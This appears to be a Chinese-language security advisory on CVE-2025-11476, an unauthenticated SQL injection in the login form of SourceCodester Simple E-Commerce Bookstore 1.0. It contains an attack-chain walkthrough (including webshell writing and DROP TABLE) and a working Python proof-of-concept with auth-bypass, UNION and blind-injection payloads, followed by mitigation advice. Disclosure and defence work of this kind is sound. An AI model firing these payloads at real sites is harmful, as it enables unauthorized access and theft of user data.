CVE-2025-11476：SourceCodester在线书店系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11476

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Simple E-Commerce Bookstore

漏洞概述

CVE-2025-11476是SourceCodester Simple E-Commerce Bookstore 1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于应用程序的/index.php文件中，具体涉及对login_username参数的处理逻辑。由于开发者未对该用户输入参数进行充分的过滤和参数化处理，攻击者可以通过构造恶意的SQL语句片段，将其注入到后端数据库查询中，从而实现未授权的数据库操作。

该漏洞的CVSS 3.1评分为7.3，属于高危级别。攻击者无需任何身份认证即可远程发起攻击，也不需要目标用户的任何交互操作。成功利用此漏洞后，攻击者可以读取、修改或删除数据库中的敏感数据，包括用户凭证、个人信息、订单记录等电商核心数据。此外，SQL注入漏洞还可能被进一步利用来执行数据库管理操作，甚至在某些配置环境下实现远程代码执行，对系统安全构成严重威胁。

该漏洞的利用代码已公开披露在GitHub等平台上（参考链接：https://github.com/DrNbnonono/CVE/issues/5），这大大降低了攻击的技术门槛，使得任何具备基础SQL注入知识的攻击者都可以轻松利用该漏洞。由于该产品为开源电商系统，可能被大量中小型电商网站部署使用，因此该漏洞的实际影响范围可能较为广泛。建议相关用户尽快采取防护措施。

技术细节

该SQL注入漏洞的根本原因在于/index.php文件中对login_username参数的处理未采用预编译语句（Prepared Statements）或参数化查询，而是直接将用户输入拼接到SQL查询语句中。当用户在登录表单的username字段提交包含SQL特殊字符（如单引号'、注释符--、UNION关键字等）的输入时，这些恶意内容会被直接嵌入到后端SQL语句中执行。

利用方式方面，攻击者可以通过以下步骤实施攻击：首先，访问目标网站的登录页面（通常对应/index.php），定位到login_username参数对应的输入字段；然后，构造包含SQL注入payload的恶意请求，例如使用经典的' OR '1'='1' -- 或基于UNION的注入语句来绕过身份验证或提取数据库内容；最后，通过分析应用的响应（如错误信息、页面内容差异等）来确认注入是否成功，并进一步利用盲注（Boolean-based或Time-based）技术提取数据库中的敏感信息。

由于该漏洞的攻击向量为网络（AV:N）、攻击复杂度低（AC:L）、无需权限（PR:N）、无需用户交互（UI:N），且对机密性、完整性、可用性均存在低级别影响，因此综合评分为7.3分。攻击者可利用该漏洞绕过登录验证获取管理员权限，或直接通过UNION查询读取数据库中的所有数据，包括管理员密码哈希、用户个人信息及商业数据等。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过搜索引擎（如Shodan、Censys）或已知漏洞特征识别部署了SourceCodester Simple E-Commerce Bookstore 1.0的目标网站，定位登录页面/index.php。

STEP 2

步骤2：漏洞探测

攻击者向login_username参数提交测试payload（如单引号'），通过观察应用响应（错误信息、HTTP状态码、页面内容差异）确认SQL注入漏洞的存在。

STEP 3

步骤3：注入Payload构造

根据漏洞类型构造相应的SQL注入payload，包括：认证绕过payload（' OR '1'='1' --）、UNION联合查询payload（提取数据库信息）、时间盲注payload（基于SLEEP函数）等。

STEP 4

步骤4：数据提取

利用确认的SQL注入漏洞，通过UNION查询或盲注技术提取数据库中的敏感信息，包括管理员账号密码哈希、用户个人信息、订单数据等。

STEP 5

步骤5：权限提升与持久化

利用提取的管理员凭证登录后台管理系统，获取更高权限；或通过SQL注入写入webshell，实现对服务器的持久化控制。

STEP 6

步骤6：数据破坏与影响扩大

攻击者可执行DROP TABLE等破坏性SQL语句删除数据库，或窃取并出售用户数据，进一步扩大攻击影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11476 - SourceCodester Simple E-Commerce Bookstore SQL Injection PoC
# Vulnerable parameter: login_username in /index.php
# Vulnerability type: SQL Injection (Unauthenticated)

import requests
import sys

TARGET_URL = "http://target.com/index.php"

# SQL Injection payload to bypass authentication
# The login_username parameter is directly concatenated into SQL query without sanitization
payloads = [
    # Authentication bypass payload
    {
        "login_username": "' OR '1'='1' -- ",
        "login_password": "anything"
    },
    # UNION-based injection to extract database version
    {
        "login_username": "' UNION SELECT 1,version(),3,4-- ",
        "login_password": "anything"
    },
    # UNION-based injection to extract table names
    {
        "login_username": "' UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- ",
        "login_password": "anything"
    },
    # Time-based blind injection for data extraction
    {
        "login_username": "' OR IF(1=1, SLEEP(5), 0)-- ",
        "login_password": "anything"
    },
    # Boolean-based blind injection
    {
        "login_username": "' OR SUBSTRING(version(),1,1)='5'-- ",
        "login_password": "anything"
    }
]

def exploit_sqli(target_url, payload):
    """Send SQL injection payload to vulnerable endpoint"""
    try:
        response = requests.post(target_url, data=payload, timeout=10, allow_redirects=False)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Request failed: {e}")
        return None

def main():
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET_URL
    print(f"[*] Target: {target}")
    print(f"[*] CVE-2025-11476 - SQL Injection in login_username parameter")
    print("-" * 60)

    # Test authentication bypass
    print("\n[+] Testing authentication bypass...")
    resp = exploit_sqli(target, payloads[0])
    if resp and resp.status_code in [200, 302]:
        print(f"[SUCCESS] Authentication bypass may be successful!")
        print(f"    Status Code: {resp.status_code}")
        if resp.status_code == 302:
            print(f"    Redirect Location: {resp.headers.get('Location', 'N/A')}")

    # Test UNION-based injection
    print("\n[+] Testing UNION-based injection...")
    resp = exploit_sqli(target, payloads[1])
    if resp:
        print(f"    Status Code: {resp.status_code}")
        # Check if version info is reflected in response
        if "5." in resp.text or "MariaDB" in resp.text or "MySQL" in resp.text:
            print(f"[SUCCESS] Database version likely leaked in response!")

    # Test time-based blind injection
    print("\n[+] Testing time-based blind injection...")
    import time
    start_time = time.time()
    resp = exploit_sqli(target, payloads[3])
    elapsed = time.time() - start_time
    print(f"    Elapsed time: {elapsed:.2f} seconds")
    if elapsed >= 5:
        print(f"[SUCCESS] Time-based blind injection confirmed!")

if __name__ == "__main__":
    main()

影响范围

SourceCodester Simple E-Commerce Bookstore 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面部署WAF规则，拦截包含常见SQL注入特征（如UNION SELECT、' OR 1=1、SLEEP()等）的请求；2）通过修改源代码对login_username参数进行紧急过滤，使用addslashes()或mysqli_real_escape_string()等函数对特殊字符进行转义处理；3）限制/index.php的访问频率，实施IP级别的访问控制；4）将数据库连接账户降权，仅授予必要的SELECT、INSERT权限；5）监控数据库日志，关注异常查询行为；6）考虑暂时关闭登录功能或限制管理后台的访问IP范围。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11476
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11476
3 Details https://www.cvedetails.com/cve/CVE-2025-11476/
4 VulDB https://vuldb.com/cve/CVE-2025-11476
5 Link https://github.com/DrNbnonono/CVE/issues/5
6 Link https://vuldb.com/?ctiid.327594
7 Link https://vuldb.com/?id.327594
8 Link https://vuldb.com/?submit.667117
9 Link https://www.sourcecodester.com/